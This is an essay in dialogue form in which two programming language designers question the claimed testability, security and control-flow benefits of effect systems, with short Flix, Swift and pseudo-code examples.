On the purported benefits of effect systems

Intended audience: Programming language designers and enthusiasts with some passing familiarity with effect systems.

The following represents a hypothetical conversation between two programming language designers Emmett and Pratik on the purported benefits of effect systems, and the pros and cons of supporting them in a general purpose language.

Common ground

Emmett: Hey, I’ve been reading a lot about effect systems lately. These are supported by newer languages such as Unison, Koka and Flix. They are related to some research coming out of the functional programming community, and in part driven by the difficulties when using monads and monad transformers.

For example, an Environment effect could look something like:

// Allows access to information about the running system etc.
effect Environment {
    // Get command-line arguments
    getArgs() -> List[String]
    // Get the value for a specific env var
    getVar(name: String) -> Option[String]

    // ... other methods
}

So when you write code which reads an environment variable, you’d do something like:

fun getLogLevel() ->{Environment} LogLevel {
    match getVar("LOG_LEVEL") {
        Some("error") => return LogLevel.Error
        Some("warn") => return LogLevel.Warn
        Some("info") => return LogLevel.Info
        Some("debug") => return LogLevel.Debug
        _ => return LogLevel.Info
    }
}

Pratik: Hmm, should that function assert if we get a string other than one of the predetermined strings…?

Emmett: Let’s not change the topic, we’re talking about effect systems.

Pratik: Okay.

So here’s my view of effect systems. Basically there are two parts:

  1. Effect handlers: These let you build custom control flow primitives by essentially allowing you to manipulate continuations. Depending on the exact language semantics, the continuations can be called at most once, exactly once, or multiple times, with other combinations also being possible. These are currently supported by OCaml.

  2. Type and effect systems: These involve equipping function types with information on what effects a function performs, or more precisely, is allowed to perform. A common example is a List.map operation which can have a more precise type of something like:

    forall a b e. (List[a], (a) ->{e} b) ->{e} List[b]

    Here e will have the kind Effect which is different from the kind of a which is Type. This examples also utilizes effect polymorphism since we have a type parameter e which can be instantiated with different effects such as an Exception effect etc.

    In a language like Swift, the Sequence.map operation has the signature:

    func map<T, E>(_ transform: (Self.Element) throws(E) -> T) throws(E) -> [T] where E : Error

    and an AsyncSequence.map operation with the signature:

    func map<T>(_ transform: @escaping (Self.Element) async -> T) -> AsyncMapSequence<Self, T>

    In some ways, the effect polymorphic signature generalizes these, if we ignore some details around whether the function argument is allowed to escape or not, the fact that the return types do not line up quite as neatly as the idealized List.map signature…

Emmett: Yep, yep. Before we talk about the details, there are a couple of more key things.

You can have more than one effect for a function. Consider the type:

() ->{Network, Console} Unit

This corresponds to a function which can access the network and potentially stdin/stdout/stderr.

Additionally, effects are often combined with so-called row types which support type-level operations such as combination/merging/union and potentially even subtraction.

In Flix, the standard library’s effects all come with functions like:https://doc.flix.dev/library-effects.html

/// Runs `f` handling the `Clock` effect using `IO`.
def runWithIO(f: Unit -> a \ ef): a \ (ef - {Clock} + IO)

here, - represents a subtraction operation, and + represents merging.

So you can write code like:

def main(): Unit \ IO =
    run {
        let timestamp = Clock.currentTime(TimeUnit.Milliseconds);
        println("${timestamp} ms since the epoch")
    } with Clock.runWithIO

Here, the Flix runtime can handle the IO effect, whereas ordinary user code cannot handle it.

Effect systems and testing

Emmett: Right, that’s a good overview. Turns out, effects have many benefits. The blog post Algebraic Effects in Practice with Flix points out:

  1. Effects make your code testable

  2. Effects give immediate visibility into what your own and 3rd-party code is doing

  3. Effects enable user-defined control flow abstractions

Pratik: Hmm, I’m not so sure about that. Let’s talk about the testable bit. Specifically, let’s do a step-by-step analysis of the claim.

  1. What are the problems you see when trying to test software?
  2. What existing techniques do people use to avoid the problems in point 1?
  3. What improvements do effects provide over the techniques in point 1?
  4. What are some examples of software that you would consider well-tested, and will their testing techniques apply when using algebraic effects?

Emmett: Fair enough. I guess there are a lot of reasons why software can be hard to test:

  1. For complex systems, it’s often hard to determine what the correct behavior of the system ought to be.
  2. It’s hard to come up with edge cases (when doing unit testing).
  3. It’s hard to do intelligent exploration of the state space (when doing property-based testing). Coverage-guided fuzzing helps, but it’s not a silver bullet.
  4. Hidden dependencies such as via global variables.
  5. The program behavior depends on timing.
  6. Dependencies on complex third-party software. This can include browsers for testing frontend code, or third-party APIs and databases for backend code.
  7. Use of concrete types in certain places can make it difficult to substitute things for testing purposes.

There must be more reasons, but these ones come to mind right now.

Pratik: OK, that’s a decent list. So out of these, how do people address these challenges?

Emmett: Here are some solutions that I know of:

  1. Using dependency injection instead of acquiring resources directly.
  2. Using increasingly thorough/sophisticated forms of testing:
    • Property-based testing
    • Differential testing
    • Building reference implementations that are easier to audit for correctness
    • Deterministic simulation testing
    • Fuzzing, with and without coverage guidance
    • Chaos testing
    • Mutation testing
  3. Adding test-only or always-on assertions to the system-under-test.
  4. Testing against real versions of third-party dependencies instead of mocking/stubbing them out. For example, some API providers even provide test environments.
  5. Using interfaces or similar instead of concrete types to allow substituting types when running tests.
  6. Avoiding/Banning global variables.

Pratik: That’s a good list. So out of this list, do you think the benefits conveyed by algebraic effects are similar to those as those of dependency injection?

As far as I can tell, for all the other points, algebraic effects do not particularly help you use other testing techniques.

Emmett: How so?

Pratik: When you’re doing dependency injection, you are essentially passing in a struct/record of first-class functions as an argument, be that in the form of a “mock” sub-class, an interface in Go, a type class dictionary in Haskell or something else.

This is similar to the use of effect handlers, and the so-called ‘capability-passing style’ for effect handlers makes this concrete.

I’ve heard some people say derisively that dependency injection is a $10 word for a 5¢ concept. I guess I get it to some extent. One interesting thing here is that dependency injection as a term is more commonly used in the object-oriented community. In contrast, algebraic effects come from the functional programming community.

That said, from the testing POV, the requirements, benefits and downsides all have parallels. More specifically:

Emmett: But! There is a but! With effects, generally the effects don’t need to be explicitly passed down to all the functions, they are passed implicitly based on the effect available in context (based on its type).

For example, in Go, you pass around a context.Context value down to functions which can be canceled, so it is “viral” in the same way as effects, but it requires manual plumbing. Similarly, if you want to pass around a Logger, then now you have another extra parameter. So you can end up having a lot of boilerplate when explicitly passing parameters around/doing dependency injection.

Pratik: Right, I was getting to that. An effect system as a language feature can roughly be broken down into the following distinct components:

These may additionally be accompanied by the restriction of “no global variables” but that’s a separate consideration.

Emmett: That seems to me like an unnecessarily detailed way of looking at things, as if you’re thinking about how to compile effects. From the point of view of a programmer, an effect system is “one” thing.

Pratik: The reason for doing this decomposition is that it lets us do a closer comparison to other languages.

For example, Go has a way of defining interfaces (essentially, records of functions), and Rust has a way of defining traits, which can even have associated types. So if you have a language which already has these kinds of features, looking at the decomposition allows you to be more precise in articulating what exactly an effect system buys you.

As another example, GHC Haskell has had the ImplicitParameters extension for a while, and both Scala and Kotlin support some form of implicit passing of arguments down call chains. However, the presence of these features doesn’t somehow magically make code in these languages more testable.

For row types/union types/intersection types/set-theoretic types, there are existing languages which support them for data types (i.e. types of the kind Type); they don’t have to be supported for effects specifically.

In my view, what is more notable about Flix is the insistence on no global variables, which means that you are forced to pass data as parameters, either grouped as a record, splatted out as distinct parameters, or by sticking it into the receiver of a method.

However, this doesn’t require supporting effects; it can also be done with a style guide (optionally, with a linter) to forbid global state, plus a set of base APIs which avoid global state. For example, there is the cap-std crate in the Rust ecosystem which provides an alternative to standard library APIs where capabilities are made explicit.

Emmett: So what you’re saying is that Flix code is arguably more testable by virtue of forbidding global variables, not because of the effect system?

Pratik: Exactly. Ascribing the benefit of more testable code to the effect system is a misattribution. In imperative languages, it’s not unusual for (say) compiler codebases to have a “virtual filesystem” to allow for easier testing. This is architecture discipline in action, where you’re making the choice to avoid a globals-based API in favor of parameter passing.

Emmett: Hmm, I guess I get what you’re saying. Passing parameters is straightforward. Defining new record types is also simple. So if you want the benefits of more testable code, you can get them in other languages with less “sophisticated” type systems, without effects.

And if you have the social capital to mandate the switch to a language with an effect system, you surely also have sufficient social capital to instead advocate for a particular linter and/or code style in whatever existing language you’re already using.

Pratik: Yep, that’s right. Also, for the virtual filesystem example I mentioned, while you can get the benefit of more testable code by using that, you don’t automatically get the benefit of more well-tested code. To actually get that, your virtual filesystem needs to actually return errors that you could get in production, model symlinks, and so on, so that you can properly exercise various code paths.

You need to write (or have your test generator generate) test cases with unusual characteristics, and make sure things don’t fall over.

Here, effect systems or dependency injection do not really help you. You still need to do the hard work of defining how the system ought to behave in various circumstances, and that of actually testing that system does behave how you expect.

Security benefits

Pratik: So one of the other points you brought up was security.

Emmett: Yeah, supply chain attacks keep happening. For example, recently the Shai-hulud worm attack on npm packages.

Pratik: Do you know how that attack happened?

Emmett: Erm…

Pratik: That attack happened based on account compromises followed by code execution in post-install scripts (called build scripts in some languages).

Emmett: Well, build scripts should not be allowed network access! Or maybe you should be required to approve such scripts before running.

Pratik: Right, so your proposed solution relies on sandboxing/permission control, along with manual auditing. It doesn’t have anything to do with effects.

Emmett: But! But! It seems like requiring a function to declare whether it requires the network would be useful as a security measure… Don’t you agree?

Pratik: This point is really about banning global variables and/or borrowing semantics/escape tracking, not that of tracking effects.

If global variables are permitted, and escaping the capability to use the network is allowed, then one function could smuggle the capability into a global variable, which could then be used by other logic at a later point in time, even if the function signature is “pure.”

Only if you can guarantee that the above cannot happen, does it make sense to “audit” a function by checking whether any of the parameters’ field types allow sending network requests (e.g. if there’s a Network value somewhere in the set of field types transitively reachable from the parameters.)

More generally, from a security POV, attackers want to often gain arbitrary code execution. To prevent that, some things that can work are:

For example, even safe Rust doesn’t guarantee perfect freedom from memory safety issues if you take interfaces like /proc/self/mem into account. In Flix terms, you might see an API that needs file reading and writing permissions, but inferring “this will not arbitrarily corrupt memory” from such a type signature is not valid.

If FFI is allowed without needing a dedicated effect, then FFI opens up another attack vector. On the other hand, requiring a dedicated effect for FFI which cannot be handled (e.g. Flix requires the IO effect for FFI) can lead to potentially odd-looking APIs such as a cryptography or compression API which is technically a pure function but still has some effect.

If you look at actual attacks today, attackers often take advantage of:

  1. Build scripts, which are generally run without sandboxing, and have arbitrary system access.
  2. Existing APIs which are already expected to have some network access.

For both of these situations, sandboxing and auditing can help. Having an effect system arguably does very little to help.

Emmett: What you’re saying makes sense. So it seems like the argument that “effect systems are useful for security” relies on attackers “playing by the rules”, but of course, attackers are not looking to abide by rules, they’re seeking to get advantages in whatever manner possible.

Sandboxing and code auditing are some proven approaches which help thwart and detect certain classes of attacks.

User-defined control flow

Pratik: One of the other potential upsides of having an effect system that you brought up was being able to have user-defined control flow. For example, you can have async/await, generators, backtracking, exceptions etc. built on top of effects.

Emmett: Yeah, that seems really useful. You get all of these mechanisms for “free” when you add support for effects. In other languages, you’re generally adding support for these one-by-one.

Pratik: So are you framing it as a benefit for language implementors or for language users?

Emmett: Hmm, I guess it is useful for implementors, but it’s also useful for language users. For example, you could have a custom scheduler for async/await.

Pratik: You can have custom schedulers for async/await without having an effect system. For example, in Rust, the language doesn’t come with one specific “async runtime” – these are defined in libraries. And while this is useful for some situations, such as being able to use specialized runtimes for specific use cases, it also brings downsides where certain libraries are coupled to certain runtimes.

Emmett: Yeah, that’s true, many Rust libraries which use async only work with the Tokio runtime, so the flexibility does have some downsides.

Pratik: One other example you brought up was exceptions. For exceptions, the usefulness comes from the stack trace when the exception is logged. However, you don’t get a stack trace for “free” when you implement support for effects, you need to add support for stack traces separately.

Emmett: Yeah, that’s a fair point.

Pratik: More generally, I’m not super sure that user-defined control flow is generally a good idea. For example, if you’ve ever tried using the Tardis monad in Haskell, if you’re not careful about what you’re doing, it’s easy to end up with an infinite loop/hang, which can be hard to debug.

Similarly, when implementing backtracking algorithms, if the book-keeping is done using stacks and visited sets, it’s relatively straightforward to debug an issue by simply logging the state at every step. However, if this state becomes part of the call stack, then it seems potentially harder to debug when things go wrong, because it’s generally more difficult and expensive to dynamically introspect the call stack.

Emmett: I think that makes sense. When writing an interpreter, it’s tempting to write it in a recursive style. However, when things go wrong, it can often be harder to debug, because you potentially need to log data in many different places.

On the other hand, if the interpreter is written as a loop which dispatches over instructions one-by-one, just adding logging at the start of every loop iteration can often be sufficient.

Pratik: Overall, I think user-defined effects can make sense when you’re doing PL research, because the goal there is to do research and try to come up with something new, not necessarily to have the best developer experience, or to have something production-ready.

The other potential place where this upside is valuable is potentially in the “core language” or “core IR” on top of which other things are built. In the core, it is often useful to have fewer primitives that compose in flexible ways.

But in a production language, user-defined control flow can potentially make it hard to on-board new people, as well as for libraries to interoperate.

Assertions in the presence of effects

Pratik: One of the other things that I think the use of effects compromises is the use of run-time assertions.

Assertions and contract programming have been widely used in some of the most thoroughly tested pieces of open source software, such as SQLite, FoundationDB and more recently popularized by TigerBeetle as a part of ‘Tiger Style’.

Emmett: Are there studies showing that higher assertion density or contract programming lead to lower defect rates?

Pratik: So there’s a paper from Microsoft Research called Assessing the Relationship between Software Assertions and Code Quality: An Empirical Investigation which looked at historical bugs and assertion usage. It uncovers a statistically significant but modest negative correlation between assertion density and fault density.

I’m not aware of better studies in the area.

Emmett: So there is some evidence indicating that assertion usage is linked to lower defect rates. What’s the problem with assertions and effects though?

Pratik: Let’s say you have an assert function or macro? What effects should it be annotated with?

Emmett: Hmm, maybe an Exception/Throws effect? It can throw an AssertionError.

Pratik: What if you want to have a compile-time switch where you want to terminate the program if an assertion fires? For example, if you value safety more than availability, this might make more sense to terminate the program and have a supervisor process restart your process.

Emmett: In that case, maybe assert should have an Exit effect as the default?

Pratik: What if you’re writing a webserver in a SaaS application where availability is perhaps higher priority, and it makes more sense to abort the request, but not to terminate the server process wholesale?

Emmett: Ugh, yeah, it’s difficult to cater to different people’s different priorities. I guess maybe assert could be a special function, similar to a debug logging function, where it can perform some effect, but you have something special to catch the error or terminate, instead of it going through the normal effect system?

Pratik: OK, so you’re suggesting making assertions a compiler builtin. What if I want to have a wrapper around it where I’m collecting timing information and collecting that with my other metrics? Presumably, I’d need access to a clock and some global state to record the timings, but then my instrumented assertion function cannot be a drop-in replacement for the standard one, because the instrumented function needs to use effects explicitly.

Emmett: I see what you’re getting at. With assertions, there’s certain flexibility that is useful to have for such a primitive operation. However, if this requires changing the calling code, you inhibit experimentation.

I suppose the same objection would apply to primitive numeric operations, where languages sometimes offer the ability to change the default behavior from wrapping to trapping. However, that is ruled out as an option if terminating the program is modeled as an effect in the type system.

Banning global variables

Pratik: The last thing I want to bring up is banning global variables.

Emmett: Don’t tell me you’re in favor of using global variables!

Pratik: I’m not necessarily in favor of using global variables. The point against global variables and in favor of explicit parameter passing (or using effects) is that it allows you to substitute values when running tests, while running the tests in parallel.

However, sometimes the point about testing can have less priority than other points. For example in Leaving Rust gamedev after 3 years, LogLog Games states:

As far as a [typical game like a 2D platformer, a top down shooter, or a voxel based walking simulator] is concerned, there is only one audio system, one input system, one physics world, one deltaTime, one renderer, one asset loader. Maybe for some edge cases it would be slightly more convenient if some things weren’t global, and maybe if you’re making a physics based MMO your requirements are different.

Game development often involves a greater focus on functional testing and manual QA, with less focus on automated testing.

Similarly, when prototyping or making small scripts or tools in other contexts, it can be useful to have the ability to use global variables.

Emmett: Hmm, I hadn’t considered those kinds of examples before. I guess I can see the case where judicious use of global variables can be helpful in some cases.

Pratik: The whole post by LogLog Games is well-worth a read; it challenged many of my previous notions on language design.

One more wrinkle related to global variables is that even if you ban them in the language, if the language has FFI, it’s almost certainly the case that the language on the other side of the FFI allows global variables, so dependencies on global state might sneak in through there.

Wrapping up

Emmett: Hmm, after all of this conversation, I have to say that my enthusiasm for effect systems has dampened quite a bit.

Pratik: Don’t get me wrong, I think effect systems are cool because of the ability to define custom control flow operations in libraries.

However, the wide variety of purported benefits do not seem to stand up to close scrutiny.